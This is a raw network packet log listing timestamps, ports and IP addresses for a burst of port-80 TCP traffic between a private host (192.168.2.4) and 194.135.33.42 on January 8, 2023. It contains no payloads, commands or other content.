Jan 8, 2023 16:15:22.749876976 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749892950 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.749897957 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749917984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749936104 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.749937057 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749958038 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749974966 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.749977112 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.749999046 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750011921 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750019073 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750039101 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750046015 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750061035 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750080109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750097990 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750098944 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750118017 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750128984 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750137091 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750169039 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750211000 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750231028 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750251055 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750262022 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750303030 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750412941 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750464916 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750483990 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750503063 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750513077 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750555992 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750575066 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750598907 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750618935 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750639915 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750648975 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750660896 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750682116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.750704050 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.750735998 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777348042 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777388096 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777406931 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777426004 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777446032 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777460098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777472973 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777486086 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777492046 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777498960 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777520895 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777543068 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777545929 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777565002 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777585030 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777585030 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777607918 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777625084 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777628899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777652025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777672052 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777673960 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777693033 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777717113 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777736902 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777740955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777762890 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777791977 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777812958 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777832031 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777853966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777873039 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777880907 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777893066 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777914047 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777925968 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777932882 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777951956 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777961016 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.777972937 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777992010 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.777997017 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778031111 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778052092 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778055906 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778073072 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778093100 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778105974 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778111935 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778132915 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778151035 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778156042 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778173923 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778193951 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778204918 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778215885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778235912 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778238058 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778255939 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778265953 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778275967 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778296947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778310061 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778316975 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778337955 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778354883 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778362989 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778388977 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778392076 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778418064 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778443098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778448105 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.778471947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.778501034 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.804824114 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.804886103 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.804935932 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.804965973 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.804992914 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805020094 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805047035 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805061102 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805073977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805104017 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805115938 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805177927 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805349112 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805396080 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805468082 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805589914 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805619955 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805645943 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805671930 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805679083 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805710077 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805740118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805752993 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805768013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805794954 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805804014 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805823088 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805849075 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805871964 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805877924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805906057 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805915117 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805933952 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805958986 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.805962086 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.805991888 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806019068 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806035995 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806046009 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806073904 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806080103 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806103945 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806124926 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806132078 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806159973 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806186914 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806197882 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806214094 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806232929 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806241989 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806271076 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806298018 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806303978 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806327105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806351900 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806353092 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806380987 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806406975 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806421995 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806435108 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806458950 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806463003 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806492090 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806519032 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806530952 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806546926 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806574106 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806577921 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806602001 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806627989 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.806628942 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.806685925 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.832211971 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832267046 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832298994 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832328081 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832359076 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832389116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832396030 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.832417965 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832449913 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.832464933 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.832524061 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.833698988 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833745956 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833772898 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833798885 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833822012 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833842039 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.833849907 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833883047 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833884954 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.833913088 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833935022 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.833942890 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833975077 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.833985090 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834007025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834034920 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834038973 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834065914 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834081888 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834095955 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834124088 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834144115 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834152937 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834182024 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834203959 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834212065 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834244013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834264040 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834275007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834302902 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834326982 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834331989 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834362984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834389925 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834389925 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834422112 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834439993 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834450960 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834481955 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834501028 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834511042 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834542990 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834561110 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834572077 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834602118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834619999 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834630966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834661007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834688902 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834688902 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834745884 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834765911 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834777117 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834806919 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834825993 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834836006 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834872007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834897041 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834902048 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834934950 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.834958076 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.834966898 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.835019112 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.859884024 CET	80	49697	211.119.84.112	192.168.2.4
Jan 8, 2023 16:15:22.864620924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864677906 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864708900 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864756107 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864784002 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864811897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864840984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864872932 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864896059 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.864902020 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864932060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864959955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.864963055 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864995003 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.864998102 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865025997 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865056038 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865056992 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865087032 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865103960 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865189075 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865221024 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865247011 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865247965 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865298033 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865365028 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865395069 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865423918 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865449905 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865499020 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865529060 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865561008 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865582943 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865617990 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865642071 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865653038 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865683079 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865710020 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865715027 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865773916 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865783930 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865814924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865844011 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865864038 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865874052 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865922928 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.865926981 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.865993977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866044998 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866137981 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866302967 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866341114 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866363049 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866369963 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866400957 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866420031 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866482973 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866549015 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866579056 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866612911 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866641998 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866662979 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866672039 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866715908 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866722107 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866746902 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866775036 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866801977 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866802931 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866832972 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866852045 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866863966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866892099 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866920948 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866925955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.866952896 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.866976976 CET	49698	80	192.168.2.4	194.135.33.42
